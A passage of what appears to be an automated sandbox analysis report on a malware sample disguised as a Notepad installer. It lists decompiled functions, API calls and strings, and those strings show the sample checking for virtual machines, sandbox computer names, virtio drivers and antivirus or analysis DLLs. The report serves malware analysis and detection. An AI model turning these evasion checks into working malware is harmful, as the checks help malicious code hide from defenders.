                                      • StrStrIW.SHLWAPI(?,Xen), ref: 006EAD81
                                      • StrStrIW.SHLWAPI(?,Virtual), ref: 006EAD8F
                                      • StrStrIW.SHLWAPI(?,A M I), ref: 006EAD9D
                                      • VariantClear.OLEAUT32(00000008), ref: 006EADA7
                                      • VariantClear.OLEAUT32(00000008), ref: 006EADC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant$wcscmp
                                      • String ID: A M I$Parallels$ROOT\CIMV2$SELECT * FROM Win32_BIOS$SerialNumber$VMWare$Virtual$Xen
                                      • API String ID: 2949752953-4050143825
                                      • Opcode ID: 73d875611b0374049517e76720f66e7675ef9decb99135317edda999d887c770
                                      • Instruction ID: b8e48a5132e82af150b70cf156535e31be6dc20a917656caf465687c80c05f1d
                                      • Opcode Fuzzy Hash: 73d875611b0374049517e76720f66e7675ef9decb99135317edda999d887c770
                                      • Instruction Fuzzy Hash: 7541F875A01249EFCF00DBD5CC45DEEBBBAEF48705B10015AE606E6260DB71AE41CF61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EC64D Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 006EC6AE
                                        • Part of subcall function 006E98DD: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006EB5D1), ref: 006E98F3
                                        • Part of subcall function 006E98DD: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E98FF
                                        • Part of subcall function 006E98DD: GetCurrentProcess.KERNEL32(00000000,?,?,006EB5D1), ref: 006E9912
                                      • Wow64DisableWow64FsRedirection.KERNEL32(00000000), ref: 006EC6C1
                                      • PathCombineW.SHLWAPI(?,?,006F68D0,00000000,006EC717), ref: 006EC6DF
                                      • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 006EC70C
                                      Strings
                                      • System32\drivers\vioinput.sys, xrefs: 006EC688
                                      • System32\drivers\viofs.sys, xrefs: 006EC67A
                                      • System32\drivers\balloon.sys, xrefs: 006EC665
                                      • System32\drivers\netkvm.sys, xrefs: 006EC66C
                                      • System32\drivers\viorng.sys, xrefs: 006EC68F
                                      • System32\drivers\vioser.sys, xrefs: 006EC69D
                                      • System32\drivers\vioscsi.sys, xrefs: 006EC696
                                      • System32\drivers\pvpanic.sys, xrefs: 006EC673
                                      • System32\drivers\viogpudo.sys, xrefs: 006EC681
                                      • System32\drivers\viostor.sys, xrefs: 006EC6A4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Wow64$Redirection$AddressCombineCurrentDirectoryDisableHandleModulePathProcProcessRevertWindows
                                      • String ID: System32\drivers\balloon.sys$System32\drivers\netkvm.sys$System32\drivers\pvpanic.sys$System32\drivers\viofs.sys$System32\drivers\viogpudo.sys$System32\drivers\vioinput.sys$System32\drivers\viorng.sys$System32\drivers\vioscsi.sys$System32\drivers\vioser.sys$System32\drivers\viostor.sys
                                      • API String ID: 1174745796-1126929258
                                      • Opcode ID: f7f32bd13bb68aaa5f7cf6b4853ec33a57c17c81131f23449ca063a7fad908f0
                                      • Instruction ID: d359f45d381a399f308ab6c0b88e3e352e161ab2d46d710df33634ef592e983c
                                      • Opcode Fuzzy Hash: f7f32bd13bb68aaa5f7cf6b4853ec33a57c17c81131f23449ca063a7fad908f0
                                      • Instruction Fuzzy Hash: EE116AB1D0134DABCF10EFA1C8889EEBFBAEF04358F105469E615B6210D3749A09CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E7985 Relevance: 24.1, APIs: 7, Strings: 9, Instructions: 82COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: $Do$TDo$accept-range$authorizatio$cache-contro$content-rang$if-none-matc$last-modifie$x-reproxy-ur
                                      • API String ID: 1475443563-2093361865
                                      • Opcode ID: 60ccc390938b51bb81e5e728944bf10e7a93ce670c9e64ea92081f9ff57516be
                                      • Instruction ID: 0aa7707c803ad927e4547605bfb74011dcd72b0c7e9cc902aafebf7b72da2a71
                                      • Opcode Fuzzy Hash: 60ccc390938b51bb81e5e728944bf10e7a93ce670c9e64ea92081f9ff57516be
                                      • Instruction Fuzzy Hash: 1C116D0578B3D971E560662B1D02BBB1E4BAB22766F0501B1FF15E97C7EA81CE034186
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA679 Relevance: 22.8, APIs: 5, Strings: 8, Instructions: 60stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006EA730: malloc.MSVCRT ref: 006EA73E
                                        • Part of subcall function 006EA730: GetComputerNameW.KERNEL32(00000000,00000010), ref: 006EA750
                                        • Part of subcall function 006EA730: ??3@YAXPAX@Z.MSVCRT ref: 006EA75B
                                        • Part of subcall function 006EA76B: GetComputerNameExW.KERNEL32(00000001,00000000,00000000,?,?,?,?,006EA6CE), ref: 006EA783
                                        • Part of subcall function 006EA76B: malloc.MSVCRT ref: 006EA78D
                                        • Part of subcall function 006EA76B: GetComputerNameExW.KERNEL32(00000001,00000000,00000000,?,?,?,006EA6CE), ref: 006EA7A1
                                        • Part of subcall function 006EA76B: ??3@YAXPAX@Z.MSVCRT ref: 006EA7A8
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA6D8
                                      • lstrcmpiW.KERNEL32(006F4F90,?), ref: 006EA6F6
                                      • lstrcmpiW.KERNEL32(006F4F90,?), ref: 006EA700
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA71F
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA724
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$ComputerName$lstrcmpimalloc
                                      • String ID: 7SILVIA$FORTINET$HANSPETER-PC$JOHN-PC$MUELLER-PC$SANDBOX$TEQUILABOOMBOOM$WIN7-TRAPS
                                      • API String ID: 1785924915-283957803
                                      • Opcode ID: fbe3974c313311dc89754529ab1fc6f637aff40f0d6dda4913b4502b0120998a
                                      • Instruction ID: e654483b249264d0f1b32b9c3cb9bd1ff3a26d7df324bbf7e2f224e559d2da0b
                                      • Opcode Fuzzy Hash: fbe3974c313311dc89754529ab1fc6f637aff40f0d6dda4913b4502b0120998a
                                      • Instruction Fuzzy Hash: 16114C75C02249ABCF00DFE699844EFBFF6FB48314B20406AE504B2210DB716A45DFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA3EC Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 36COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(006F4CEC,?,006EA46B), ref: 006EA453
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dbghelp.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                      • API String ID: 4139908857-1599972391
                                      • Opcode ID: 39185b8923eb18d53040d009ad283e37eed0d29584a00d74e9f5367ef903b1d8
                                      • Instruction ID: 5fc2c5afe0e3ab5fb153ebb27e662eb5fde7e43551b4c4a0b27798679379fe98
                                      • Opcode Fuzzy Hash: 39185b8923eb18d53040d009ad283e37eed0d29584a00d74e9f5367ef903b1d8
                                      • Instruction Fuzzy Hash: 190146B090225C9ACB008FCA98495EFFFB6FB40358F116518D6103BA40CBB05A49CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403C50 Relevance: 22.7, APIs: 15, Instructions: 175COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: fread$calloc$fclosemalloc
                                      • String ID:
                                      • API String ID: 2646035366-0
                                      • Opcode ID: a5f636ddabbf71c48d5555a460fb35cbfe25219f68d3dc7d10797edcd0fa45a6
                                      • Instruction ID: d9d86b8fb0151e4f2d6dd6e2cde8c4d87c555c4293bffcd5749d885b4ea02852
                                      • Opcode Fuzzy Hash: a5f636ddabbf71c48d5555a460fb35cbfe25219f68d3dc7d10797edcd0fa45a6
                                      • Instruction Fuzzy Hash: FC71E4B16087019FD710EF66C08461EFBE4AF89754F40882EE9C997391D77AE944CB8A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E69F6 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 133memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SysAllocString.OLEAUT32(006E34CD), ref: 006E6A40
                                      • SysAllocString.OLEAUT32(?), ref: 006E6A47
                                      • SysAllocString.OLEAUT32(?), ref: 006E6A4F
                                      • SysAllocString.OLEAUT32(open), ref: 006E6A59
                                      • VariantInit.OLEAUT32(?), ref: 006E6A92
                                      • VariantInit.OLEAUT32(?), ref: 006E6A98
                                      • VariantInit.OLEAUT32(?), ref: 006E6A9E
                                      • SysFreeString.OLEAUT32(00000000), ref: 006E6B11
                                      • SysFreeString.OLEAUT32(00000000), ref: 006E6B24
                                      • SysFreeString.OLEAUT32(00000000), ref: 006E6B2F
                                      • SysFreeString.OLEAUT32(00000000), ref: 006E6B3A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$InitVariant
                                      • String ID: open
                                      • API String ID: 1538505634-2758837156
                                      • Opcode ID: 731ec8ac756600484e5daac8bbe8a5f7e438c97ec4b95e628035896a0274bdd9
                                      • Instruction ID: 6e855e53decdbb9e53d63b4256dc56d22bdbdddb7a525374075c5bab6f50069c
                                      • Opcode Fuzzy Hash: 731ec8ac756600484e5daac8bbe8a5f7e438c97ec4b95e628035896a0274bdd9
                                      • Instruction Fuzzy Hash: B4410872D11628EBCF15EFE8DC8559DBBB6BF09350F14052AF900EB220EBB25855CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EB847 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 121COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrW.SHLWAPI(?,82801FB), ref: 006EB901
                                      • StrStrW.SHLWAPI(?,82441FX), ref: 006EB90F
                                      • StrStrW.SHLWAPI(?,82371SB), ref: 006EB91D
                                      • StrStrW.SHLWAPI(?,OpenHCD), ref: 006EB92B
                                      • VariantClear.OLEAUT32(?), ref: 006EB936
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: 82371SB$82441FX$82801FB$Name$OpenHCD$ROOT\CIMV2$SELECT * FROM Win32_PnPEntity
                                      • API String ID: 261499160-1741924195
                                      • Opcode ID: a02f2cc5eba71ef4ac0b61072ea8d99bcbdb51134a160d0a792361d18cd0a978
                                      • Instruction ID: e33f6b834c033259def15301705999b097cd7661d33aa746995456aff2d6ca75
                                      • Opcode Fuzzy Hash: a02f2cc5eba71ef4ac0b61072ea8d99bcbdb51134a160d0a792361d18cd0a978
                                      • Instruction Fuzzy Hash: B7413872901219AFCF00DBA9CC84DEFB7BAEF49700B104165E605E7265D7719E45CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004037E0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 99stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _assertfread$_strdupcallocmallocstrlen
                                      • String ID: B$io.c$q - p <= tot_len$q - p == tot_len
                                      • API String ID: 835829720-2310581195
                                      • Opcode ID: d0db2be5c5fbd2f7d390cb6c79bdd190cb6ce75fb11b0e0cfd8f111b1cd98210
                                      • Instruction ID: 7834ae578d035c725f40ee2a96df98fc1c140526aa4e0dcc43f4c88cc89e0ad0
                                      • Opcode Fuzzy Hash: d0db2be5c5fbd2f7d390cb6c79bdd190cb6ce75fb11b0e0cfd8f111b1cd98210
                                      • Instruction Fuzzy Hash: 4F4107B16087159FC700EF29C48065FBBE4BF88358F45893EF9C8A7341D77999498B8A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F1C63 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 31libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,006EF519), ref: 006F1C71
                                      • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 006F1C81
                                      • GetProcAddress.KERNEL32(00000000,NtDeviceIoControlFile), ref: 006F1C8E
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,006EF519), ref: 006F1C9A
                                      • GetProcAddress.KERNEL32(00000000,SetFileCompletionNotificationModes), ref: 006F1CA4
                                      • GetProcAddress.KERNEL32(00000000,CancelIoEx), ref: 006F1CB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: CancelIoEx$NtDeviceIoControlFile$RtlNtStatusToDosError$SetFileCompletionNotificationModes$kernel32.dll$ntdll.dll
                                      • API String ID: 667068680-3528419419
                                      • Opcode ID: 89714222d9f26c8ed531766802198eddd904fe8563e252a1f5107bc52ad36d96
                                      • Instruction ID: aef3dfb06f99d8a49771045ac9179a8e290c0368048e4edae06ed911fdceddf3
                                      • Opcode Fuzzy Hash: 89714222d9f26c8ed531766802198eddd904fe8563e252a1f5107bc52ad36d96
                                      • Instruction Fuzzy Hash: 22E0C0B1A403296A87006BB6AC49C37AEAFED947663421427F608D3661D6B45410CEA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E7AF7 Relevance: 19.6, APIs: 5, Strings: 8, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: ,Co$<Co$accept-encodin$accept-languag$dCo$x-compress-hin$x-forwarded-fo$x-frame-option
                                      • API String ID: 1475443563-3629954870
                                      • Opcode ID: 38a92a1ddb99d230190f9a2bf3d97e96233363a5e270e0293cf79c04b407176e
                                      • Instruction ID: 90fdbbb26de1f950fdafbe06a2fd488814475662fc898c8a8d7b12c39a9d0772
                                      • Opcode Fuzzy Hash: 38a92a1ddb99d230190f9a2bf3d97e96233363a5e270e0293cf79c04b407176e
                                      • Instruction Fuzzy Hash: 2801784579A3CA31E6746A2B5D02BB71D0BAB20BA6F0509B5FF14EC7C6E982CD434111
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E7BC4 Relevance: 19.6, APIs: 5, Strings: 8, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: (Eo$<Eo$content-encodin$content-languag$content-locatio$tCo$www-authenticat$x-xss-protectio
                                      • API String ID: 1475443563-2250256078
                                      • Opcode ID: 587adf6817f7215e48e36ff344912a73ce007e4fc5a212454227e24ea10f1e4f
                                      • Instruction ID: 90dd8a6872a3ac8f973108cdda69fb56209c5c32a07f31b479450de9fea8eef4
                                      • Opcode Fuzzy Hash: 587adf6817f7215e48e36ff344912a73ce007e4fc5a212454227e24ea10f1e4f
                                      • Instruction Fuzzy Hash: 6001A205B8F7DA31D560142B1D42BBB2D4B9B22766F0104B1FF24E9BCBFA41CE035046
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EBC56 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 146COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrW.SHLWAPI(?,VirtualBox), ref: 006EBD1D
                                      • VariantClear.OLEAUT32(?), ref: 006EBD2A
                                      • memset.NTDLL ref: 006EBD37
                                      • StrStrW.SHLWAPI(?,Oracle Corporation), ref: 006EBD6F
                                      • VariantClear.OLEAUT32(?), ref: 006EBD7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant$memset
                                      • String ID: Manufacturer$Oracle Corporation$Product$ROOT\CIMV2$SELECT * FROM Win32_BaseBoard$VirtualBox
                                      • API String ID: 3783832041-3002637288
                                      • Opcode ID: a914e9dcc2f29cee96ec7c16c9550b9d394afe492223b5020f0d4ea9edfe652e
                                      • Instruction ID: 4fd5cdc88aa519f9af6791b4a74183564025c08725762294550d3b50fc122c41
                                      • Opcode Fuzzy Hash: a914e9dcc2f29cee96ec7c16c9550b9d394afe492223b5020f0d4ea9edfe652e
                                      • Instruction Fuzzy Hash: 5A41057190135DABCB10DFE6CC889EFBBBAEF48710B145459E601EB250D7709A41CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EADFC Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 115COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrIW.SHLWAPI(?,VirtualBox), ref: 006EAEB0
                                      • StrStrIW.SHLWAPI(?,HVM domU), ref: 006EAEBE
                                      • StrStrIW.SHLWAPI(?,VMWare), ref: 006EAECC
                                      • VariantClear.OLEAUT32(00000008), ref: 006EAED6
                                      • VariantClear.OLEAUT32(00000008), ref: 006EAEEC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: HVM domU$Model$ROOT\CIMV2$SELECT * FROM Win32_ComputerSystem$VMWare$VirtualBox
                                      • API String ID: 261499160-3582534201
                                      • Opcode ID: 8e837d99ad58064b5f8ae157f9a19ea66f1e3b09e305149c8d2aedcd6af892ff
                                      • Instruction ID: fe780da1437bee4b76e30b2d977ba01f7694b5c759d329426703f5291bc0d3c3
                                      • Opcode Fuzzy Hash: 8e837d99ad58064b5f8ae157f9a19ea66f1e3b09e305149c8d2aedcd6af892ff
                                      • Instruction Fuzzy Hash: F641F772901219EFCB00DBE9CC859EEBBBAEF48714B10405AF605E7250DB71AE45DBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E5602 Relevance: 18.2, APIs: 11, Strings: 1, Instructions: 171COMMON
                                      Download Yara Rule
                                      APIs
                                      • memcpy.NTDLL(00000000,00000000,?,?,00000001,?,006E4E1F,?,?,?,?,?,006E4E52,?,?,?), ref: 006E5637
                                      • memcpy.NTDLL(00000000,?,?,00000000,00000000,?,?,00000001,?,006E4E1F,?,?,?,?,?,006E4E52), ref: 006E564B
                                      • memcpy.NTDLL(00000000, HTTP/1.1Host: ,00000011,00000000,?,?,00000000,00000000,?,?,00000001,?,006E4E1F,?), ref: 006E565E
                                      • memcpy.NTDLL(00000000,?,?,00000000, HTTP/1.1Host: ,00000011,00000000,?,?,00000000,00000000,?,?,00000001,?,006E4E1F), ref: 006E5670
                                      • memcpy.NTDLL(00000000,00000000,?,?,00000001,?,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E56BE
                                      • memcpy.NTDLL(?,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E56D9
                                      • memcpy.NTDLL(00000000,00000000,55C3C95E,?,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E56F6
                                      • memcpy.NTDLL(00000000,00000000,?,?,00000001,?,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E5755
                                      • memcpy.NTDLL(?,?,?,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E5777
                                      • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E5795
                                      • memcpy.NTDLL(?,006F3CF0,00000002,?,?,?,006E4E52,?,?,?,?,55C3C95E), ref: 006E57C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: HTTP/1.1Host:
                                      • API String ID: 3510742995-2447342782
                                      • Opcode ID: a4aa6462b7eb2b999c25fc9b770df3a6e28301b5b7ee01ff6bc573fb88a20238
                                      • Instruction ID: 287f9a89577c9811981b495580d96e882e1ae984ad1aacb35a5e93f7039b3b4f
                                      • Opcode Fuzzy Hash: a4aa6462b7eb2b999c25fc9b770df3a6e28301b5b7ee01ff6bc573fb88a20238
                                      • Instruction Fuzzy Hash: 5F616F75500A46EFCF01DF58C885E99BBAAFF14308F544099F8499B217D371EA61CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EBB1D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrW.SHLWAPI(?,ACPIBus_BUS_0), ref: 006EBBD7
                                      • StrStrW.SHLWAPI(?,PCI_BUS_0), ref: 006EBBE5
                                      • StrStrW.SHLWAPI(?,PNP_BUS_0), ref: 006EBBF3
                                      • VariantClear.OLEAUT32(?), ref: 006EBC00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: ACPIBus_BUS_0$Name$PCI_BUS_0$PNP_BUS_0$ROOT\CIMV2$SELECT * FROM Win32_Bus
                                      • API String ID: 261499160-4459919
                                      • Opcode ID: 90de20eb5fa85a05a891a4166c51f10025a5e3ba69e750c0686e84f0c2890ef4
                                      • Instruction ID: dc4672bab3ff911a3200dbaa68f01e154e11160a80c7a7c5cd37682e8b9fc8ef
                                      • Opcode Fuzzy Hash: 90de20eb5fa85a05a891a4166c51f10025a5e3ba69e750c0686e84f0c2890ef4
                                      • Instruction Fuzzy Hash: DD4108B6D0121AABCB00DB95CC85DEFB7BAEF48B00F244095E615E7255DB719E41CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403A46 Relevance: 16.6, APIs: 11, Instructions: 124fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
